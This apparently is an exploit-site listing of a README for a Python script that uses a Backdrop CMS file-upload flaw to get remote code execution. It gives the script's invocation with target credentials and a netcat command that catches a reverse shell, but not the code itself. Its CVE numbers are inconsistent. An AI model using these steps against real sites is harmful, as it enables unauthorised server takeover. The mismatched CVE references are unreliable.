Exploit for Unrestricted Upload of File with Dangerous Type in Backdropcms Backdrop Cms CVE-2023-46818 CVE-2022-42902 CVE-2022-42092

Name: Exploit for Unrestricted Upload of File with Dangerous Type in Backdropcms Backdrop Cms CVE-2023-46818 CVE-2022-42902 CVE-2022-42092
Rating: 5 (226 reviews)

2025-04-27 | CVSS 8.8

## https://sploitus.com/exploit?id=41F3A9C4-DD4E-5BFC-BD81-EB8F44845275
# CVE-2022-42092 Python Exploit

## 🔥 Description
This Python exploit script targets an unrestricted file upload in Backdrop CMS to achieve a Remote Code Execution (RCE).

## ⚠️ Affected Versions
Version 1.22.0 and prior version
Note: Backdrop CMS disputes this and argues that advanced permissions are required, which is why it might still exist in versions above 1.22.0. I’m guessing they mean you would need to have admin access first. Still, it’s a valid vulnerability, and it can definitely be exploited to gain full system control.

## ⚙️ Usage
```shell
python3 CVE-2022-42902.py <target_url> <username> <password> <listener_ip> <listener_port>
```
Important: Start your listener before running the script:
```shell
nc -lvnp <listener_port>
```

## 💻 Sample Run
![image](https://github.com/user-attachments/assets/62f02ffc-3de5-4b72-b274-9575e3b4780f)

## ℹ️ Reference
- [CVE-2022-42092 Detail](https://nvd.nist.gov/vuln/detail/CVE-2022-42092)